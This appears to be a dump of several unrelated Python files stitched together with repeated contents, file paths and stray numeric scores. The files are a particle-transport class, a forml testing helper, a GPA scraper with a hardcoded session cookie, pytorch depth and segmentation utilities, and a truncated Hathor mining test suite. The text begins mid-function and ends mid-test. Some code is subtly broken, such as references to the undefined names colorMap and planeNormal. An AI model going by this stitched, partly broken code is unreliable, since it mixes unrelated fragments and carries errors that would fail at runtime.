self.__mu_y = sin_theta*(self.__mu_y*self.__mu_z + self.__mu_x*sin_phi)/(np.sqrt(1 - self.__mu_z**2)) + self.__mu_y*cos_theta
self.__mu_z = -sin_theta*cos_phi*np.sqrt(1 - self.__mu_z**2) + self.__mu_z*cos_theta | src/particle.py | import numpy as np
import matplotlib.pyplot as plt
import random
import detector as dct
class Particle:
def __init__(self,id,pos,mu,energy):
self.id = id
self.__x = pos[0]
self.__y = pos[1]
self.__z = pos[2]
self.__mu_x = mu[0]
self.__mu_y = mu[1]
self.__mu_z = mu[2]
self.__energy = 0
self.__weight = 1
self.__is_alive = True
@property
def mu(self):
return [self.__mu_x,self.__mu_y, self.__mu_z]
@property
def position(self):
return [self.__x, self.__y, self.__z]
@property
def energy(self):
return self.__energy
@property
def is_alive(self):
return self.__is_alive
@position.setter
def position(self, value):
self.__x = value[0]
self.__y = value[1]
self.__z = value[2]
@energy.setter
def energy(self, value):
self.__energy = value
def pprint(self):
print(self.__x,self.__y,self.__z,self.__mu_x,self.__mu_y, self.__mu_z)
def gen_random_angles(self):
angle_data = {}
zeta = random.random()
phi = 2*np.pi*zeta
angle_data["cos_theta"] = 2*zeta - 1
angle_data["sin_theta"] = np.sqrt(1 - angle_data["cos_theta"]**2)
angle_data["cos_phi"] = np.cos(phi)
angle_data["sin_phi"] = np.sin(phi)
return angle_data
def update_weight(self,mu_t,mu_a):
treshold = 0.2
self.__weight = self.__weight*(1- mu_a/mu_t)
if self.__weight < treshold:
self.__is_alive = False
def is_in_detector(self,detector):
# check if the particle is in the detector
if isinstance(detector, dct.Detector):
if detector.parametric_check(self):
return True
else:
return False
else:
raise Warning("Volume is not a detector")
def evolve(self,s):
self.__x = self.__x + self.__mu_x*s
self.__y = self.__y + self.__mu_y*s
self.__z = self.__z + self.__mu_z*s
def update_energy(self, cos_theta):
pass
def update_cosines(self, sin_theta, cos_theta, sin_phi, cos_phi):
# we update to the new cosines after interaction
self.__mu_x = sin_theta*(self.__mu_x*self.__mu_z - self.__mu_y*sin_phi)/(np.sqrt(1 - self.__mu_z**2)) + self.__mu_x*cos_theta
self.__mu_y = sin_theta*(self.__mu_y*self.__mu_z + self.__mu_x*sin_phi)/(np.sqrt(1 - self.__mu_z**2)) + self.__mu_y*cos_theta
self.__mu_z = -sin_theta*cos_phi*np.sqrt(1 - self.__mu_z**2) + self.__mu_z*cos_theta | 0.644449 | 0.431165 |
import logging
import typing
import uuid
from forml import flow, io, project
from forml.conf.parsed import provider as provcfg
from forml.io import dsl, layout
from forml.runtime import facility
from forml.testing import _spec
LOGGER = logging.getLogger(__name__)
class DataSet(dsl.Schema):
"""Testing schema.
The actual fields are irrelevant.
"""
feature: dsl.Field = dsl.Field(dsl.Integer())
label: dsl.Field = dsl.Field(dsl.Float())
class Feed(io.Feed[None, typing.Any], alias='testing'):
"""Special feed to input the test cases."""
def __init__(self, scenario: _spec.Scenario.Input, **kwargs):
super().__init__(**kwargs)
self._scenario: _spec.Scenario.Input = scenario
# pylint: disable=unused-argument
@classmethod
def reader(
cls, sources: typing.Mapping[dsl.Source, None], features: typing.Mapping[dsl.Feature, typing.Any], **kwargs
) -> typing.Callable[[dsl.Query], typing.Sequence[typing.Sequence[typing.Any]]]:
"""Return the reader instance of this feed (any callable, presumably extract.Reader)."""
def read(query: dsl.Query) -> typing.Any:
"""Reader callback.
Args:
query: Input query instance.
Returns:
Data.
"""
return features[DataSet.label] if DataSet.label in query.features else features[DataSet.feature]
return read
@classmethod
def slicer(
cls, schema: typing.Sequence[dsl.Feature], features: typing.Mapping[dsl.Feature, typing.Any]
) -> typing.Callable[[layout.ColumnMajor, typing.Union[slice, int]], layout.ColumnMajor]:
"""Return the slicer instance of this feed, that is able to split the loaded dataset column-wise."""
return lambda c, s: c[s][0]
@property
def sources(self) -> typing.Mapping[dsl.Source, None]:
"""The explicit sources mapping implemented by this feed to be used by the query parser."""
return {DataSet: None}
@property
def features(self) -> typing.Mapping[dsl.Feature, typing.Any]:
"""The explicit features mapping implemented by this feed to be used by the query parser."""
return {DataSet.label: (self._scenario.train, [self._scenario.label]), DataSet.feature: self._scenario.apply}
class Launcher:
"""Test runner is a minimal forml pipeline wrapping the tested operator."""
class Initializer(flow.Visitor):
"""Visitor that tries to instantiate each node in attempt to validate it."""
def __init__(self):
self._gids: set[uuid.UUID] = set()
def visit_node(self, node: flow.Worker) -> None:
if isinstance(node, flow.Worker) and node.gid not in self._gids:
self._gids.add(node.gid)
node.spec()
def __init__(self, params: _spec.Scenario.Params, scenario: _spec.Scenario.Input, runner: provcfg.Runner):
self._params: _spec.Scenario.Params = params
self._source: project.Source = project.Source.query(DataSet.select(DataSet.feature), DataSet.label)
self._feed: Feed = Feed(scenario)
self._runner: provcfg.Runner = runner
def __call__(self, operator: type[flow.Operator]) -> facility.Virtual.Builder:
instance = operator(*self._params.args, **self._params.kwargs)
initializer = self.Initializer()
segment = instance.expand()
segment.apply.accept(initializer)
segment.train.accept(initializer)
segment.label.accept(initializer)
return self._source.bind(instance).launcher(self._runner, [self._feed]) | forml/testing/_facility.py | import logging
import typing
import uuid
from forml import flow, io, project
from forml.conf.parsed import provider as provcfg
from forml.io import dsl, layout
from forml.runtime import facility
from forml.testing import _spec
LOGGER = logging.getLogger(__name__)
class DataSet(dsl.Schema):
"""Testing schema.
The actual fields are irrelevant.
"""
feature: dsl.Field = dsl.Field(dsl.Integer())
label: dsl.Field = dsl.Field(dsl.Float())
class Feed(io.Feed[None, typing.Any], alias='testing'):
"""Special feed to input the test cases."""
def __init__(self, scenario: _spec.Scenario.Input, **kwargs):
super().__init__(**kwargs)
self._scenario: _spec.Scenario.Input = scenario
# pylint: disable=unused-argument
@classmethod
def reader(
cls, sources: typing.Mapping[dsl.Source, None], features: typing.Mapping[dsl.Feature, typing.Any], **kwargs
) -> typing.Callable[[dsl.Query], typing.Sequence[typing.Sequence[typing.Any]]]:
"""Return the reader instance of this feed (any callable, presumably extract.Reader)."""
def read(query: dsl.Query) -> typing.Any:
"""Reader callback.
Args:
query: Input query instance.
Returns:
Data.
"""
return features[DataSet.label] if DataSet.label in query.features else features[DataSet.feature]
return read
@classmethod
def slicer(
cls, schema: typing.Sequence[dsl.Feature], features: typing.Mapping[dsl.Feature, typing.Any]
) -> typing.Callable[[layout.ColumnMajor, typing.Union[slice, int]], layout.ColumnMajor]:
"""Return the slicer instance of this feed, that is able to split the loaded dataset column-wise."""
return lambda c, s: c[s][0]
@property
def sources(self) -> typing.Mapping[dsl.Source, None]:
"""The explicit sources mapping implemented by this feed to be used by the query parser."""
return {DataSet: None}
@property
def features(self) -> typing.Mapping[dsl.Feature, typing.Any]:
"""The explicit features mapping implemented by this feed to be used by the query parser."""
return {DataSet.label: (self._scenario.train, [self._scenario.label]), DataSet.feature: self._scenario.apply}
class Launcher:
"""Test runner is a minimal forml pipeline wrapping the tested operator."""
class Initializer(flow.Visitor):
"""Visitor that tries to instantiate each node in attempt to validate it."""
def __init__(self):
self._gids: set[uuid.UUID] = set()
def visit_node(self, node: flow.Worker) -> None:
if isinstance(node, flow.Worker) and node.gid not in self._gids:
self._gids.add(node.gid)
node.spec()
def __init__(self, params: _spec.Scenario.Params, scenario: _spec.Scenario.Input, runner: provcfg.Runner):
self._params: _spec.Scenario.Params = params
self._source: project.Source = project.Source.query(DataSet.select(DataSet.feature), DataSet.label)
self._feed: Feed = Feed(scenario)
self._runner: provcfg.Runner = runner
def __call__(self, operator: type[flow.Operator]) -> facility.Virtual.Builder:
instance = operator(*self._params.args, **self._params.kwargs)
initializer = self.Initializer()
segment = instance.expand()
segment.apply.accept(initializer)
segment.train.accept(initializer)
segment.label.accept(initializer)
return self._source.bind(instance).launcher(self._runner, [self._feed]) | 0.863521 | 0.414425 |
# Cookie
import requests
import pandas as pd
from bs4 import BeautifulSoup
headers = {
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36',
'Cookie':'JSESSIONID=68E5E9087DD3404B3502CD3077A8CDB4',
}
url = 'http://172.16.17.32:8080/jsxsd/xk/LoginToXk'
session = requests.Session()
response = session.get('http://172.16.17.32:8080/jsxsd/kscj/cjcx_list', headers=headers)
df = pd.read_html(response.text)[0]
# 我们需要的一共是三列 第一列是课程名称 第二列是绩点 第三列是学分
# 因为我们需要先对数据进行处理 所以我们可以先把课程名称和绩点作为字典
# key:课程名称 values:字典
column_dict = dict(zip(df['课程名称'],df['学分']))
list1 = ["军事理论与训练","形势与政策","大学生职业生涯与规划","体育1","体育2","体育3","体育4"]
list2 = ["思想道德修养与法律基础","政治经济学","中国近现代史纲要","毛泽东思想和中国特色社会主义理论体系概论","马克思主义基本原理概论","书法鉴赏","道德修养和法律基础","英语口语"]
for key in column_dict.keys():
if key in list1:
column_dict[key] = 0.0
elif key in list2:
column_dict[key] = 1.0
elif key in ["大学英语1","大学英语2","大学英语3","大学英语4"]:
column_dict[key] = 2.0
# print(column_dict)
# 我们修改完学分之后需要对此成绩列做对应 我们可以把学分列取出来 然后和成绩共同组成一个列表
# w为了保证正确 我们可以现判断一下长度是否一致
print(column_dict)
list3 = []
for val in column_dict.keys():
list3.append(float(column_dict[val]))
# 我们接下来需要根据成绩修正绩点
list4 = []
for tem in df['成绩']:
if tem in ['优','良','中','合格','及格','不及格']:
# 此时说我们该项课程的成绩是五级分制
if tem == "优":
list4.append(4)
continue
elif tem =='良':
list4.append(3)
continue
elif tem =='中':
list4.append(2)
continue
elif tem =='及格' or tem =='合格':
list4.append(2)
continue
else:
list4.append(0)
continue
else:
tem = float(tem)
if tem >= 85:
list4.append(4)
elif tem>=75 and tem <= 84:
list4.append(3)
elif tem>=60 and tem <=74:
list4.append(2)
elif tem <60:
list4.append(0)
# print(list4)
# 我们现在已经得到修正过后的绩点列 现在把学分和绩点整合到一个list中
# print(list3)
list_final = [list4,list3]
sum_score=0.0
for i in list3:
sum_score+=i
print(sum_score)
sum = 0.0
for i in range(0,len(list4)):
sum += list_final[0][i] * list_final[1][i]
print(sum)
final = float(sum)/float(sum_score)
print(">>>欢迎来到李博文的绩点查询系统>>>")
print(final)
# print(list_final)
# print(list_final[0][0])
# print(list_final[1][0]) | main.py |
# Cookie
import requests
import pandas as pd
from bs4 import BeautifulSoup
headers = {
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36',
'Cookie':'JSESSIONID=68E5E9087DD3404B3502CD3077A8CDB4',
}
url = 'http://172.16.17.32:8080/jsxsd/xk/LoginToXk'
session = requests.Session()
response = session.get('http://172.16.17.32:8080/jsxsd/kscj/cjcx_list', headers=headers)
df = pd.read_html(response.text)[0]
# 我们需要的一共是三列 第一列是课程名称 第二列是绩点 第三列是学分
# 因为我们需要先对数据进行处理 所以我们可以先把课程名称和绩点作为字典
# key:课程名称 values:字典
column_dict = dict(zip(df['课程名称'],df['学分']))
list1 = ["军事理论与训练","形势与政策","大学生职业生涯与规划","体育1","体育2","体育3","体育4"]
list2 = ["思想道德修养与法律基础","政治经济学","中国近现代史纲要","毛泽东思想和中国特色社会主义理论体系概论","马克思主义基本原理概论","书法鉴赏","道德修养和法律基础","英语口语"]
for key in column_dict.keys():
if key in list1:
column_dict[key] = 0.0
elif key in list2:
column_dict[key] = 1.0
elif key in ["大学英语1","大学英语2","大学英语3","大学英语4"]:
column_dict[key] = 2.0
# print(column_dict)
# 我们修改完学分之后需要对此成绩列做对应 我们可以把学分列取出来 然后和成绩共同组成一个列表
# w为了保证正确 我们可以现判断一下长度是否一致
print(column_dict)
list3 = []
for val in column_dict.keys():
list3.append(float(column_dict[val]))
# 我们接下来需要根据成绩修正绩点
list4 = []
for tem in df['成绩']:
if tem in ['优','良','中','合格','及格','不及格']:
# 此时说我们该项课程的成绩是五级分制
if tem == "优":
list4.append(4)
continue
elif tem =='良':
list4.append(3)
continue
elif tem =='中':
list4.append(2)
continue
elif tem =='及格' or tem =='合格':
list4.append(2)
continue
else:
list4.append(0)
continue
else:
tem = float(tem)
if tem >= 85:
list4.append(4)
elif tem>=75 and tem <= 84:
list4.append(3)
elif tem>=60 and tem <=74:
list4.append(2)
elif tem <60:
list4.append(0)
# print(list4)
# 我们现在已经得到修正过后的绩点列 现在把学分和绩点整合到一个list中
# print(list3)
list_final = [list4,list3]
sum_score=0.0
for i in list3:
sum_score+=i
print(sum_score)
sum = 0.0
for i in range(0,len(list4)):
sum += list_final[0][i] * list_final[1][i]
print(sum)
final = float(sum)/float(sum_score)
print(">>>欢迎来到李博文的绩点查询系统>>>")
print(final)
# print(list_final)
# print(list_final[0][0])
# print(list_final[1][0]) | 0.053169 | 0.285364 |
import numpy as np
import cv2
#MEAN_STD = [[0.29010095242892997, 0.32808144844279574, 0.28696394422942517], [0.1829540508368939, 0.18656561047509476, 0.18447508988480435]]
MEAN_STD = np.array([[0.5, 0.5, 0.5], [1, 1, 1]], dtype=np.float32)
MAX_DEPTH = 10
## Global color mapping
class ColorPalette:
def __init__(self, numColors):
np.random.seed(1)
self.colorMap = np.array([[255, 0, 0],
[0, 255, 0],
[0, 0, 255],
[80, 128, 255],
[128, 0, 255],
[255, 0, 255],
[0, 255, 255],
[255, 0, 128],
[255, 255, 0],
[0, 128, 255],
[50, 150, 0],
[200, 255, 255],
[255, 200, 255],
[128, 128, 80],
[0, 50, 128],
[0, 100, 100],
[0, 255, 128],
[100, 0, 0],
[0, 100, 0],
[255, 230, 180],
[255, 128, 0],
[128, 255, 0],
], dtype=np.uint8)
self.colorMap = np.maximum(self.colorMap, 1)
if numColors > self.colorMap.shape[0]:
self.colorMap = np.concatenate([self.colorMap, np.random.randint(255, size = (numColors - self.colorMap.shape[0], 3), dtype=np.uint8)], axis=0)
pass
#self.colorMap = np.random.randint(255, size = (numColors, 3), dtype=np.uint8)
#self.colorMap[0] = np.maximum(self.colorMap[0], 1)
return
def getColorMap(self):
return self.colorMap
def getColor(self, index):
if index >= colorMap.shape[0]:
return np.random.randint(255, size = (3), dtype=np.uint8)
else:
return self.colorMap[index]
pass
return
## Draw segmentation image. The input could be either HxW or HxWxC
def drawSegmentationImage(segmentations, numColors=42, blackIndex=-1, blackThreshold=-1):
if segmentations.ndim == 2:
numColors = max(numColors, segmentations.max() + 2)
else:
if blackThreshold > 0:
segmentations = np.concatenate([segmentations, np.ones((segmentations.shape[0], segmentations.shape[1], 1)) * blackThreshold], axis=2)
blackIndex = segmentations.shape[2] - 1
pass
numColors = max(numColors, segmentations.shape[2] + 2)
pass
randomColor = ColorPalette(numColors).getColorMap()
if blackIndex >= 0:
randomColor[blackIndex] = 0
pass
width = segmentations.shape[1]
height = segmentations.shape[0]
if segmentations.ndim == 3:
#segmentation = (np.argmax(segmentations, 2) + 1) * (np.max(segmentations, 2) > 0.5)
segmentation = np.argmax(segmentations, 2)
else:
segmentation = segmentations
pass
segmentation = segmentation.astype(np.int32)
return randomColor[segmentation.reshape(-1)].reshape((height, width, 3))
## Draw depth image
def drawDepthImage(depth):
depthImage = np.clip(depth / 5 * 255, 0, 255).astype(np.uint8)
depthImage = cv2.applyColorMap(255 - depthImage, colormap=cv2.COLORMAP_JET)
return depthImage
## Math operations
def softmax(values):
exp = np.exp(values - values.max())
return exp / exp.sum(-1, keepdims=True)
def one_hot(values, depth):
maxInds = values.reshape(-1)
results = np.zeros([maxInds.shape[0], depth])
results[np.arange(maxInds.shape[0]), maxInds] = 1
results = results.reshape(list(values.shape) + [depth])
return results
def sigmoid(values):
return 1 / (1 + np.exp(-values))
## Fit a 3D plane from points
def fitPlane(points):
if points.shape[0] == points.shape[1]:
return np.linalg.solve(points, np.ones(points.shape[0]))
else:
return np.linalg.lstsq(points, np.ones(points.shape[0]))[0]
return
## Metadata to intrinsics
def metadataToIntrinsics(metadata):
intrinsics = np.zeros((3, 3))
intrinsics[0][0] = metadata[0]
intrinsics[1][1] = metadata[1]
intrinsics[0][2] = metadata[2]
intrinsics[1][2] = metadata[3]
intrinsics[2][2] = 1
return intrinsics
## The function to compute plane depths from plane parameters
def calcPlaneDepths(planes, width, height, metadata):
urange = (np.arange(width, dtype=np.float32).reshape(1, -1).repeat(height, 0) / (width + 1) * (metadata[4] + 1) - metadata[2]) / metadata[0]
vrange = (np.arange(height, dtype=np.float32).reshape(-1, 1).repeat(width, 1) / (height + 1) * (metadata[5] + 1) - metadata[3]) / metadata[1]
ranges = np.stack([urange, np.ones(urange.shape), -vrange], axis=-1)
planeOffsets = np.linalg.norm(planes, axis=-1, keepdims=True)
planeNormals = planes / np.maximum(planeOffsets, 1e-4)
normalXYZ = np.dot(ranges, planeNormal.transpose())
normalXYZ[normalXYZ == 0] = 1e-4
planeDepths = planeOffsets / normalXYZ
planeDepths = np.clip(planeDepths, 0, MAX_DEPTH)
return planeDepths | pytorch/utils.py | import numpy as np
import cv2
#MEAN_STD = [[0.29010095242892997, 0.32808144844279574, 0.28696394422942517], [0.1829540508368939, 0.18656561047509476, 0.18447508988480435]]
MEAN_STD = np.array([[0.5, 0.5, 0.5], [1, 1, 1]], dtype=np.float32)
MAX_DEPTH = 10
## Global color mapping
class ColorPalette:
def __init__(self, numColors):
np.random.seed(1)
self.colorMap = np.array([[255, 0, 0],
[0, 255, 0],
[0, 0, 255],
[80, 128, 255],
[128, 0, 255],
[255, 0, 255],
[0, 255, 255],
[255, 0, 128],
[255, 255, 0],
[0, 128, 255],
[50, 150, 0],
[200, 255, 255],
[255, 200, 255],
[128, 128, 80],
[0, 50, 128],
[0, 100, 100],
[0, 255, 128],
[100, 0, 0],
[0, 100, 0],
[255, 230, 180],
[255, 128, 0],
[128, 255, 0],
], dtype=np.uint8)
self.colorMap = np.maximum(self.colorMap, 1)
if numColors > self.colorMap.shape[0]:
self.colorMap = np.concatenate([self.colorMap, np.random.randint(255, size = (numColors - self.colorMap.shape[0], 3), dtype=np.uint8)], axis=0)
pass
#self.colorMap = np.random.randint(255, size = (numColors, 3), dtype=np.uint8)
#self.colorMap[0] = np.maximum(self.colorMap[0], 1)
return
def getColorMap(self):
return self.colorMap
def getColor(self, index):
if index >= colorMap.shape[0]:
return np.random.randint(255, size = (3), dtype=np.uint8)
else:
return self.colorMap[index]
pass
return
## Draw segmentation image. The input could be either HxW or HxWxC
def drawSegmentationImage(segmentations, numColors=42, blackIndex=-1, blackThreshold=-1):
if segmentations.ndim == 2:
numColors = max(numColors, segmentations.max() + 2)
else:
if blackThreshold > 0:
segmentations = np.concatenate([segmentations, np.ones((segmentations.shape[0], segmentations.shape[1], 1)) * blackThreshold], axis=2)
blackIndex = segmentations.shape[2] - 1
pass
numColors = max(numColors, segmentations.shape[2] + 2)
pass
randomColor = ColorPalette(numColors).getColorMap()
if blackIndex >= 0:
randomColor[blackIndex] = 0
pass
width = segmentations.shape[1]
height = segmentations.shape[0]
if segmentations.ndim == 3:
#segmentation = (np.argmax(segmentations, 2) + 1) * (np.max(segmentations, 2) > 0.5)
segmentation = np.argmax(segmentations, 2)
else:
segmentation = segmentations
pass
segmentation = segmentation.astype(np.int32)
return randomColor[segmentation.reshape(-1)].reshape((height, width, 3))
## Draw depth image
def drawDepthImage(depth):
depthImage = np.clip(depth / 5 * 255, 0, 255).astype(np.uint8)
depthImage = cv2.applyColorMap(255 - depthImage, colormap=cv2.COLORMAP_JET)
return depthImage
## Math operations
def softmax(values):
exp = np.exp(values - values.max())
return exp / exp.sum(-1, keepdims=True)
def one_hot(values, depth):
maxInds = values.reshape(-1)
results = np.zeros([maxInds.shape[0], depth])
results[np.arange(maxInds.shape[0]), maxInds] = 1
results = results.reshape(list(values.shape) + [depth])
return results
def sigmoid(values):
return 1 / (1 + np.exp(-values))
## Fit a 3D plane from points
def fitPlane(points):
if points.shape[0] == points.shape[1]:
return np.linalg.solve(points, np.ones(points.shape[0]))
else:
return np.linalg.lstsq(points, np.ones(points.shape[0]))[0]
return
## Metadata to intrinsics
def metadataToIntrinsics(metadata):
intrinsics = np.zeros((3, 3))
intrinsics[0][0] = metadata[0]
intrinsics[1][1] = metadata[1]
intrinsics[0][2] = metadata[2]
intrinsics[1][2] = metadata[3]
intrinsics[2][2] = 1
return intrinsics
## The function to compute plane depths from plane parameters
def calcPlaneDepths(planes, width, height, metadata):
urange = (np.arange(width, dtype=np.float32).reshape(1, -1).repeat(height, 0) / (width + 1) * (metadata[4] + 1) - metadata[2]) / metadata[0]
vrange = (np.arange(height, dtype=np.float32).reshape(-1, 1).repeat(width, 1) / (height + 1) * (metadata[5] + 1) - metadata[3]) / metadata[1]
ranges = np.stack([urange, np.ones(urange.shape), -vrange], axis=-1)
planeOffsets = np.linalg.norm(planes, axis=-1, keepdims=True)
planeNormals = planes / np.maximum(planeOffsets, 1e-4)
normalXYZ = np.dot(ranges, planeNormal.transpose())
normalXYZ[normalXYZ == 0] = 1e-4
planeDepths = planeOffsets / normalXYZ
planeDepths = np.clip(planeDepths, 0, MAX_DEPTH)
return planeDepths | 0.510496 | 0.382545 |
import asyncio
import unittest
from collections import deque
from typing import List, Optional
from unittest.mock import ANY, MagicMock, Mock
import asynctest # type: ignore
from hathorlib.client import BlockTemplate, HathorClient
import txstratum.time
from txstratum.jobs import JobStatus, TxJob
from txstratum.manager import TxMiningManager
from txstratum.protocol import StratumProtocol
TX1_DATA = bytes.fromhex(
'0001000102000000000000089c0d40a9b1edfb499bc624833fde87ae459d495000393f4aaa00006'
'a473045022100c407d5e8f411f9ae582ebd7acbfcb6ea6170332709fb69acaa34c1b426f1d8f502'
'2003847963768eca9bcdf46e758319fb2699fd28ab657d00f54bef46c37a90405e2103755f2920f'
'f7dc32dc5414cea1cf9e078347f40894caf0c03637d083dbb261c5c000003e800001976a914a04c'
'9e2a0291f53c618fdad2ecb37748efb0eeeb88ac0000151800001976a914545f1156a3b00df622b'
'1d92968c21b962e9d7aa588ac4032a8228c4020c35ed18547020000000047c9881d2bf348d5ffd6'
'ce8398d6bc5d17b3bea75a53c15b7480be950000006ed5794bf69ebe7d7d75e7a0024d98acb85cb'
'9c101b59b8b6073e8667c84e2ee77'
)
TX1_NONCE = '84e2ee77'
TX2_DATA = bytes.fromhex(
'00010001020000000000000896f3792cf52e13978baa98ac966639946b558190f52d1d8c4900006a473045'
'022100cf557f80e59f4cc142dfeff28b54321c1787bc6faddb798093b9bd4e6fa32c60022055fbf4312f08'
'19748a6480e0d1f7d70276b3cc12276d973f991bdb2f22250b972103755f2920ff7dc32dc5414cea1cf9e0'
'78347f40894caf0c03637d083dbb261c5c0000170c00001976a914a04c9e2a0291f53c618fdad2ecb37748'
'efb0eeeb88ac000001f400001976a914a04c9e2a0291f53c618fdad2ecb37748efb0eeeb88ac4032a8228c'
'4020c35ed184d5020000006ed5794bf69ebe7d7d75e7a0024d98acb85cb9c101b59b8b6073e8667c000001'
'2a9d7b6a8895fc1fde992187e742eff81ad2e40994b595cc45056d7bb333cf514a'
)
TX2_NONCE = '33cf514a'
TOKEN_CREATION_TX_DATA = bytes.fromhex(
'00020104000005551d7740fd7d3c0acc50b5677fdd844f1225985aa431e1712af2a2fd'
'8900006a473045022100a445edb5cd6c79a0a7b5ed837582fd65b8d511ee60b64fd076'
'e07bd8f63f75a202202dca24320bffc4c3ca2a07cdfff38f7c839bde70ed49ef634ac6'
'588972836cab2103bfa995d676e3c0ed7b863c74cfef9683fab3163b42b6f21442326a'
'023fc57fba0000264800001976a9146876f9578221fdb678d4e8376503098a9228b132'
'88ac00004e2001001976a914031761ef85a24603203c97e75af355b83209f08f88ac00'
'00000181001976a9149f091256cb98649c7c35df0aad44d7805710691e88ac00000002'
'81001976a914b1d7a5ee505ad4d3b93ea1a5162ba83d5049ec4e88ac0109546f546865'
'4d6f6f6e04f09f9a804034a52aec6cece75e0fc0e30200001a72272f48339fcc5d5ec5'
'deaf197855964b0eb912e8c6eefe00928b6cf600001055641c20b71871ed2c5c7d4096'
'<KEY>'
)
TOKEN_CREATION_TX_NONCE = '01ff7369'
class HathorClientTest(HathorClient):
def __init__(self, server_url: str, api_version: str = '/v1a/'):
self._current_index = 0
BLOCK_DATA_1 = bytes.fromhex('000001ffffffe8b789180000001976a9147fd4ae0e4fb2d2854e76d359029d8078bb9'
'9649e88ac40350000000000005e0f84a9000000000000000000000000000000278a7e')
BLOCK_DATA_2 = bytes.fromhex('0000010000190000001976a9143d6dbcbf6e67b2cbcc3225994756a56a5e2d3a2788a'
'c40350000000000005e0f84de03000006cb93385b8b87a545a1cbb6197e6caff600c1'
'2cc12fc54250d39c8088fc0002d4d2a15def7604688e1878ab681142a7b155cbe52a6'
'b4e031250ae96db0a0002ad8d1519daaddc8e1a37b14aac0b045129c01832281fb1c0'
'2d873c7abbf9623731383164323332613136626139353030316465323264333135316'
'2303237652d3833623135646233343639373438626262396262393330363861383633'
'3634362d6365326637376239393130373434613162313665656666306630323161306'
'63200000002000000000000000080326758')
self._block_templates = [
BlockTemplate(data=BLOCK_DATA_1, height=0),
BlockTemplate(data=BLOCK_DATA_2, height=1),
]
def next_block_template(self) -> None:
self._current_index += 1
async def start(self):
pass
async def stop(self):
pass
async def get_block_template(self, address: Optional[str] = None) -> BlockTemplate:
return self._block_templates[self._current_index]
async def get_tx_parents(self) -> List[bytes]:
pass
async def push_tx_or_block(self, raw: bytes) -> bool:
self.next_block_template()
return True
class ManagerTestCase(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
self.client = HathorClientTest(server_url='')
self.loop.run_until_complete(self.client.start())
self.manager = TxMiningManager(backend=self.client, address=address)
self.loop.run_until_complete(self.manager.start())
self.loop.run_until_complete(self.manager.wait_for_block_template())
self.assertTrue(len(self.manager.block_template) > 0)
def _run_all_pending_events(self):
"""Run all pending events."""
# pending = asyncio.all_tasks(self.loop)
# self.loop.run_until_complete(asyncio.gather(*pending))
async def _fn():
pass
future = asyncio.ensure_future(_fn())
self.loop.run_until_complete(future)
def test_invalid_mining_address(self):
from hathorlib.exceptions import InvalidAddress
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
invalid_addresses = [
('Invalid base58', address[:-1] + 'I'), # No 'I' in base58 symbols.
('Invalid checksum', address[:-1] + 'A'),
('Invalid size (smaller)', address[:-1]),
('Invalid size (bigger)', address + '7'),
]
for idx, (cause, invalid_address) in enumerate(invalid_addresses):
with self.assertRaises(InvalidAddress):
print('Address #{}: {} ({})'.format(idx, cause, invalid_address))
TxMiningManager(backend=self.client, address=invalid_address)
def test_miner_connect_disconnect(self):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=None)
self.assertEqual(1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
conn.connection_lost(exc=None)
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_miner_connect_ready_disconnect(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
self.assertEqual(1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
conn.method_subscribe(params=None, msgid=None)
conn.method_authorize(params=None, msgid=None)
self.assertEqual(1, len(self.manager.miners))
conn.connection_lost(exc=None)
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_many_miners_connect_ready_disconnect(self, qty=5):
transport = Mock()
connections = []
for idx in range(qty):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=transport)
self.assertEqual(idx + 1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
connections.append(conn)
self.assertEqual(qty, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
for idx, conn in enumerate(connections):
conn.method_subscribe(params=None, msgid=None)
conn.method_authorize(params=None, msgid=None)
self.assertEqual(idx + 1, len(self.manager.miners))
self.assertEqual(qty, len(self.manager.connections))
self.assertEqual(qty, len(self.manager.miners))
self.manager.status()
for idx, conn in enumerate(connections):
conn.connection_lost(exc=None)
self.assertEqual(qty - idx - 1, len(self.manager.connections))
self.assertEqual(qty - idx - 1, len(self.manager.miners))
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_miner_some_jsonrpc_methods(self):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=None)
conn.send_result = MagicMock(return_value=None)
conn.method_extranonce_subscribe(params=None, msgid=None)
conn.send_result.assert_called_with(None, True)
conn.send_result = MagicMock(return_value=None)
conn.method_multi_version(params=None, msgid=None)
conn.send_result.assert_called_with(None, True)
def test_miner_method_subscribe_invalid_address1(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'abc!'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_invalid_address2(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'ZiCa'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_invalid_address3(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'HVZjvL1FJ23kH3buGNuttVRsRKq66WHXXX'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_valid_address(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
